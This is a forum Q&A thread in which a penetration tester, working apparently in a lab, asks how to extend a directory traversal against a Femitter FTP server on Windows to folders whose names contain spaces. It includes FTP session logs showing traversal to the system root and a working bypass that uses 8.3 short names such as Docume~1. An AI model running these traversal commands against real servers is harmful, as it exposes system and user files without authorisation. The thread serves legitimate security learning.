FTP directory traversal attack on directories containing white spaces

15

4

I am conducting a sanctioned pentest in a closed reference environment, and struggled upon a seemingly simple issue, I currently cannot solve.

When attempting to execute a directory traversal attack against a vulnerable Fermitter FTP server running on MS Windows OS, it is possible to do a LIST on system root (addresses and content listings changed here for reference only):

# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok

However, if I want to list the contents of a folder containing white spaces such as Documents and settings, I am not able to list the directory contents because of whites spaces being ignored.

ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok

I already tried using different FTP clients (CLI and GUI, on Linux and Windows) and either they ignore white spaces or disallow directory traversal.

Also tried scripting the attack on Python by using at first raw sockets and then ftplib to send the commands in HEX format directly to the FTP server, but with no success.

Googling for couple of hours did not yield a working solution (yes, there were a lot of options, which did not work), that is why there is someone here, who has had the same issue. Pretty sure, that this is not the first time such a directory traversal with white spaces is needed.

lockout

Posted 2016-02-23T17:56:24.713

Reputation: 411

Case sensitivity looks to be irrelevant for the FTP clients. At least the GNU/Linux FTP client lists directories ignoring the letter case. – None – 2016-02-23T18:38:34.280

@lockout: case sensitivity is a server side thing and not a client thing. The clients lists the data the same way the server sends it and does not change the case. – Steffen Ullrich – 2016-02-23T18:46:01.450

@Steffen Ullrich: Thanks! This server is not case sensitive. And case sensitivity actually is not an issue here, but the white spaces, which terminate the directory traversal are. – None – 2016-02-23T18:50:52.130

@tim: thanks! The FTP server banner, as seen in the listing, is Femitter FTP server, and not the native Windows FTP service. It could be, but I doubt it, that this issue is limited to this server edition only. – None – 2016-02-23T18:54:32.693

1Also give C:\Docume~1\ a try. – Dog eat cat world – 2016-02-23T22:15:19.527

1Try escaping the spaces with \ or quoting the directory string – DavidPostill – 2016-02-23T22:34:21.250

@Dog eat cat world: Whoa, you are right about that notation! I had forgotten about that one. Will give that one a try now, and report back. – lockout – 2016-02-24T07:25:19.893

@DavidPostill: Thanks! The option you mentioned, besides some more white-space escape approaches, was already tried initially. You can see that in the listing above. – lockout – 2016-02-24T07:33:19.740

@Dogeatcatworld: Your suggestion worked! The Windows folder short notation C:\Docume~1\ had dropped out from my head completely! I will update the post with the solution. Could you please submit your answer also so that I can mark that one as a working solution? Thanks again – lockout – 2016-02-24T07:36:58.100

Hold you horses guys! :) I am a total newcomer to this forum, and I will post the solution promptly. Just thought it would be better if the user who suggested working solution would add it to get proper credit. All calm down... thanks! – lockout – 2016-02-24T07:55:10.310

1I am happy it worked for you @lockout. Since you have gone through the trouble of answering your question, it is fine by me that you accept it as the answer. Thanks for crediting me. – Dog eat cat world – 2016-02-24T11:24:07.603

Answers

16

Solution suggested by @Dogeatcatworld to use MS Windows directory short notation such as C:\Docume~1\.

ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok

Really good article from MS Knowledge Base explains the 8.3 directory notation: How Windows Generates 8.3 File Names from Long File Names

lockout

Posted 2016-02-23T17:56:24.713

Reputation: 411

2OSCP I see. To add onto your tip, for short directories, such as "All Users", drop the space and use "AllUse~1".

Did you find a way to mount the FTP to browse interactively, or did you just end up downloading files one by one. – n00b – 2018-01-02T19:33:50.503

1

The "short name" is really the old DOS 8.3 naming convention, so all the directories will be the first 6 letters followed by ~1 assuming there is only one name that matches, for example:

C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\BCDEFG~1 - C:\BCDEFGHIJKL M Another Directory

Here is the only exception:

C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\ABCDEF~2 - C:\ABCDEFGHI Directory as well

Source: How can I find the short path of a Windows directory/file?

madsport

Posted 2016-02-23T17:56:24.713

Reputation: 11

0

Ftp doesn't use url encoding, so %xx won't work unless you're using ftp in a browser who can translate it for you.

Try using quotes around it instead, ie: ls "../../some dir"

wireghoul

Posted 2016-02-23T17:56:24.713

Reputation: 116

1HI, if you look into the attempts tried for directory traversal, you will see I attempted multiple quotes: single quote, double quote, and back tick. They did not work, as represented in the FTP output listing. Using %20 was just to experiment if that would work, because of desperate attempts to try all options. Of course % encoding works on browsers and FTP clients able to interpret them. – lockout – 2016-02-24T10:33:46.120

Asked: 2016-02-23T17:56:24.713

Viewed: 17 039 times

Active: 2019-07-13T08:12:00.073